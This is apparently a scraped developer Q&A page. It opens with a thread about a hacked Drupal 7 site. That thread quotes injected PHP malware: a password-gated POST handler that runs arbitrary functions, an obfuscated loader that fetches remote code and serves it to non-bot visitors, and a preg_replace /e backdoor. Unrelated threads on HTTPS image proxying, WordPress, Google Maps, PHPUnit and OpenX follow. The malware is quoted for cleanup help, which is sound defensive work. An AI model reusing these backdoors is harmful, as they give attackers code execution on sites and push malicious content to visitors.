includes/bootstrap.inc hacked/changed constantly - drupal

My hosting provider warned me that my bootstrap.inc file is connecting to an infected host. The issue is meant to be happening between 771 and 808 line of includes/bootstrap.inc file (code below).
This file is somehow changed constantly (once a week), from 120kb to 123kbs. Wherever this happens, I try to upload a clean file. If the file is changed/hacked, my hosting response is longer by 10-15 seconds.
The drupal 7 is updated to 7.41, the modules are up to date.
The code that's causing the issue, is somewhere between those lines (I suspect its the "cookie" part). This is the infected/added part my hosting provider warned me about:
$_passssword = '2505363ea355401256fe974720d85db8';
$p = $_POST;
if (#$p[$_passssword] AND #$p['a'] AND #$p['c']) #$p[$_passssword](#$p['a'], #$p['c'], '');
if (!empty($_GET['check']) AND $_GET['check'] == $_passssword) {
echo('<!--checker_start ');
$tmp = request_url_data('http://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css');
echo(substr($tmp, 50));
echo(' checker_end-->');
}
unset($_passssword);
$bad_url = false;
foreach (array('/\.css$/', '/\.swf$/', '/\.ashx$/', '/\.docx$/', '/\.doc$/', '/\.xls$/', '/\.xlsx$/', '/\.xml$/', '/\.jpg$/', '/\.pdf$/', '/\.png$/', '/\.gif$/', '/\.ico$/', '/\.js$/', '/\.txt$/', '/ajax/', '/cron\.php$/', '/wp\-login\.php$/', '/\/wp\-includes\//', '/\/wp\-admin/', '/\/admin\//', '/\/wp\-content\//', '/\/administrator\//', '/phpmyadmin/i', '/xmlrpc\.php/', '/\/feed\//') as $regex) {
if (preg_match($regex, $_SERVER['REQUEST_URI'])) {
$bad_url = true;
break;
}
}
$cookie_name = 'PHP_SESSION_PHP';
if (!$bad_url AND !isset($_COOKIE[$cookie_name]) AND empty($echo_done) AND !empty($_SERVER['HTTP_USER_AGENT']) AND (substr(trim($_SERVER['REMOTE_ADDR']), 0, 6) != '74.125') AND !preg_match('/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i', $_SERVER['HTTP_USER_AGENT'])) {
// setcookie($cookie_name, mt_rand(1, 1024), time() + 60 * 60 * 24 * 7, '/');
// $url = base64_decode('a3d3czksLDA2LTs0LTUwLToxLGFvbGQsPGJvc2tiJXZ3blxwbHZxYGY+NDMwMDc5NDsyMjcyOTI6MjE=');
$url = decrypt_url('a3d3czksLDA2LTs0LTUwLToxLGFvbGQsPGJvc2tiJXZ3blxwbHZxYGY+NDMwMDc5NDsyMjcyOTI6MjE=');
$code = request_url_data($url);
// if (!empty($code) AND base64_decode($code) AND preg_match('#[a-zA-Z0-9+/]+={0,3}#is', $code, $m)) {
if (($code = request_url_data($url)) AND $decoded = base64_decode($code, true)) {
$echo_done = true;
print $decoded;
}
}//iend
I'm no back-end developer and I've been using bootstrap for hobby related-project for over 8 years.
I tried to clean D7 (reuploaded fresh includes, modules and everything apart from /sites/). Tried to check this on some popular scanners.
Does anyone have any idea, how to block this changes to bootstrap.inc? Are there any successful tools for that, or modules for scanning? Or maybe someone recognizes the exploit and could give me a tip where its coming from?
Thank you in advance.

I had the same hack on my Drupal site. The code they put in the bootstrap.inc file looked almost identical to yours.
Apart of the changes to the bootstrap.inc the hackers installed multiple backdoors in various modules. I was able to find the backdoors using the Hacked module, which allows you to find modified files.
The backdoors in my Drupal looked similar to this code:
<?php #preg_replace('/(.*)/e', #$_POST['ttqdgkkfkolmt'], '');
This code uses a vulnerability in preg_replace, which allows the attackers to execute random PHP code using a simple HTTP post request. (The preg_replace vulnerably is resolved in PHP version > 5.5)
Hope this helped. Good luck finding the backdoors!

Related

Connection to this site is not Fully Secure

I have a website on which users can write blog posts. I'm using stackoverflow pagedown editor to allow users to add content & also the images by inserting their link.
But the problem is that in case a user inserts a link starting with http:// such as http://example.com/image.jpg, browser shows a warning saying,
Your Connection to this site is not Fully Secure.
Attackers might be able to see the images you are looking at
& trick you by modifying them
I was wondering how can we force the browser to use the https:// version of site only from which image is being inserted, especially when user inserts a link starting with http://?
Or is there any other solution of this issue?
image
unfortunately, browser expect to have all loaded ressources provided over ssl. On your case you have no choice than self store all images or create or proxy request from http to https. But i am not sure if is really safe to do this way.
for exemple you can do something like this :
i assume code is php, and over https
<?php
define('CHUNK_SIZE', 1024*1024); // Size (in bytes) of tiles chunk
// Read a file and display its content chunk by chunk
function readfile_chunked($filename, $retbytes = TRUE) {
$buffer = '';
$cnt = 0;
$handle = fopen($filename, 'rb');
if ($handle === false) {
return false;
}
while (!feof($handle)) {
$buffer = fread($handle, CHUNK_SIZE);
echo $buffer;
ob_flush();
flush();
if ($retbytes) {
$cnt += strlen($buffer);
}
}
$status = fclose($handle);
if ($retbytes && $status) {
return $cnt; // return num. bytes delivered like readfile() does.
}
return $status;
}
$filename = 'http://domain.ltd/path/to/image.jpeg';
$mimetype = 'image/jpeg';
header('Content-Type: '.$mimetype );
readfile_chunked($filename);
Credit for code sample
_ UPDATE 1 _
Alternate solution to proxify steamed downloaded file in Python
_ UPDATE 2 _
On following code, you can stream data from remote server to your front-end client, if your Django application is over https, content will be deliver correctly.
Goal is to read by group of 1024 bits your original images, them stream each group to your browser. This approch avoid timeout issue when you try to load heavy image.
I recommand you to add another layer to have local cache instead to download -> proxy on each request.
import requests
# have this function in file where you keep your util functions
def url2yield(url, chunksize=1024):
s = requests.Session()
# Note: here i enabled the streaming
response = s.get(url, stream=True)
chunk = True
while chunk :
chunk = response.raw.read(chunksize)
if not chunk:
break
yield chunk
# Then creation your view using StreamingHttpResponse
def get_image(request, img_id):
img_url = "domain.ltd/lorem.jpg"
return StreamingHttpResponse(url2yield(img_url), content_type="image/jpeg")

wordpress buddypress white screen of death

I just got a job of maintaining a wordpress/buddypress site.
I install the site locally with a virtual host, so that I didn't change any cfgs or code.
The site was running ok but today morning when I tries to load it I got white screen without any error in the log or anywhere.
I use a debugger to trace the problem and found the following supper-impressive code (wp-content/plugins/events-and-bookings/lib/class_wd_wpmu_oauth.php:378):
private function _refresh_token ($token) {
$this->set_parameter('refresh_token', $token, self::SCOPE_REFRESH);
$this->set_header('method', 'POST');
$raw_token = $this->_refresh_authentication_code();
if (!$raw_token) die;
$token_data = json_decode($raw_token, true);
if (!$token_data) die;
$token_data['time'] = time();
if (!isset($token_data['refresh_token'])) $token_data['refresh_token'] = $token;
$this->set_data('token_data', $token_data);
return $token_data;
}
I comment out the 2 lines that ends with die; - and WALLA! problem solved.
My questions are:
Why does the code die with out any warning - is it a security thing?
is there a better solution than commenting out these lines?
did the change I did can cause some unexpected problem that I'm unaware of?
what is that code actually doing or any info/reference to this problem.
thanks

Loading Google Maps API with wp_enqueue_script

I'm trying to load the Google Maps API using the following syntax:
add_action('admin_enqueue_scripts', 'load_google_maps');
...
function load_google_maps()
{
// The actual API key is configured in an options page
$key = get_option('google_maps_api_key');
$gmaps_url = 'http://maps.googleapis.com/maps/api/js?key=' . $key . '&sensor=false';
wp_enqueue_script('google-maps', $gmaps_url, NULL, NULL);
}
WordPress is escaping the "&" to "&#038". This actually makes the Google server reject the request. When I type it directly into browser address bar with "&sensor=false" at the end, it loads fine.
I saw a bug of this kind mentioned in the WordPress trac system: http://core.trac.wordpress.org/ticket/9243 but it was dismissed as invalid, and the admin responding to the request showed somehow that the "&#038" approach was fine. It is definitely not fine from Google's point of view.
I could of course just get the function to echo the HTML as a script tag, but I'd rather use the wp_enqueue_script system if possible.
Anyone know of a solution to this?
Cheers,
raff
I've got something similar in our code, and it's working fine (even encoded as &#038). I suspect your problem is that it's being double-encoded, as you already have &. Trying changing it to:
$gmaps_url = 'http://maps.googleapis.com/maps/api/js?key=' . $key . '&sensor=false';
For what it's worth, our (working) code is:
wp_register_script('googlemaps', 'http://maps.googleapis.com/maps/api/js?' . $locale . '&key=' . GOOGLE_MAPS_V3_API_KEY . '&sensor=false', false, '3');
wp_enqueue_script('googlemaps');
($locale in this case is set to hl=en)
Edit
Looks like the behaviour's changed in the latest version of WordPress - the above doesn't work (but I'll leave it for people on legacy versions). The only alternative I can see to echoing the script is to add a clean_url filter, something like this:
add_filter('clean_url', 'so_handle_038', 99, 3);
function so_handle_038($url, $original_url, $_context) {
if (strstr($url, "googleapis.com") !== false) {
$url = str_replace("&", "&", $url); // or $url = $original_url
}
return $url;
}
Pretty ugly, but perhaps marginally better than echoing the script, as it'll still use the WordPress dependency management.

PHPUnit Performance / Test Timeout

I am building a testing script which is checking the performance of a set of commands. The test script needs to let it run for a specific amount of time before failing the test.
I found the PerformanceTestCase in the PHPUnit documentation website, but when I tried to use it I realised that it's old functionality which hasn't been included within the new version. (That doc is PHPUnit 3.0, and my version is 3.5).
Is there an equivalent for this functionality within PHPUnit 3.5, and how do I use it?
Well, you could simply do something like
public function testFoo() {
$tStart = microtime( true );
// your time critical commands
$tDiff = microtime( true ) - $tStart;
$this->assertLessThan( $maxTime, $tDiff, 'Took too long' );
}
Of course this means that your commands will not be interrupted before being finished.
And IMO unittests are not meant for testing performance.
I ran into a smiliar issue today - I needed to test an external HTTP call was occuring within the allocated time.
Rather than build another loop or take $start and $end time readings - I exposed the timed_out param, detailed here http://www.php.net/manual/en/function.stream-get-meta-data.php
while (!feof($fp)) {
$info = stream_get_meta_data($fp);
if ($info['timed_out']) {
$this->timed_out = true;
fclose($fp);
throw new Exception("Request timed out");
}
else {
$response .= fgets($fp, 128);
}
}
fclose($fp);

OpenX and geotargeting problem

I downloaded the latest version of OpenX 2.8.6 and I am trying to setup geotargeting, but it doesn't work. I enabled geoTargeting in administration panel ( Configuration -> Global settings -> Geotargeting module type -> OpenX Max mind (flat file) ). I read in documentation of OpenX that it's not necessary to put any path to the database in plugin settings, so I tried without. I setup delivery options of test banner to be shown only in Serbia. I am refresshing the page that displays banners, but this banner never shows.
I thought that maybe the problem is in old database and that my IP address is not recognised, so I downloaded the latest one database (.dat file) from MaxMind (lite version of Country database) and put the path in settings of the plugin, but it still doesn't work.
Can anyone help me how to resolve this problem?
I had the same problem. It seems that OpenX since version 2.8.x is using its own php-based GeoIP-Database reader (e.g. the "flatfile" option under settings) instead of using a geoip module - which does not seem to work with current GeoIP.dat
To solve this problem I did the following:
1) open plugins/geoTargeting/oxMaxMindGeoIP/oxMaxMindGeoIP.delivery.php
2) search for:
if (isset($GLOBALS['_MAX']['GEO_IP'])) {
$ip = $GLOBALS['_MAX']['GEO_IP'];
OX_Delivery_logMessage('['.$ip.'] : ip from cookie. Plugin_geoTargeting_oxMaxMindGeoIP_oxMaxMindGeoIP_Delivery_getGeoInfo', 7);
} else {
$ip = $_SERVER['REMOTE_ADDR'];
OX_Delivery_logMessage('['.$ip.'] : ip from remote addr. Plugin_geoTargeting_oxMaxMindGeoIP_oxMaxMindGeoIP_Delivery_getGeoInfo', 7);
}
$aGeoConf = (is_array($conf['oxMaxMindGeoIP'])) ? $conf['oxMaxMindGeoIP'] : array();
3) insert below:
$ret = array(
"country_code" => $_SERVER['GEOIP_COUNTRY_CODE']
);
return $ret;
4) save & done
You will find possible return values in the function header:
* #return array An array(
* 'country_code',
* 'region',
* 'city',
* 'postal_code',
* 'latitude',
* 'longitude',
* 'dma_code',
* 'area_code',
* 'organisation',
* 'isp',
* 'netspeed'
* );
*/
Read your module-doc (of mod_geoip) how to get the geo-data from current (or given) IP. In my above example I am using lighttpd 1.5 + mod_geoip (unofficial module). But this fix should also work with apache_note/pecl-geoip/mod_geoip env...
Oh and btw. its of course much faster relying on mod_geoip which caches the db in memory, than doing it all via php on every request (as openx does it).

Resources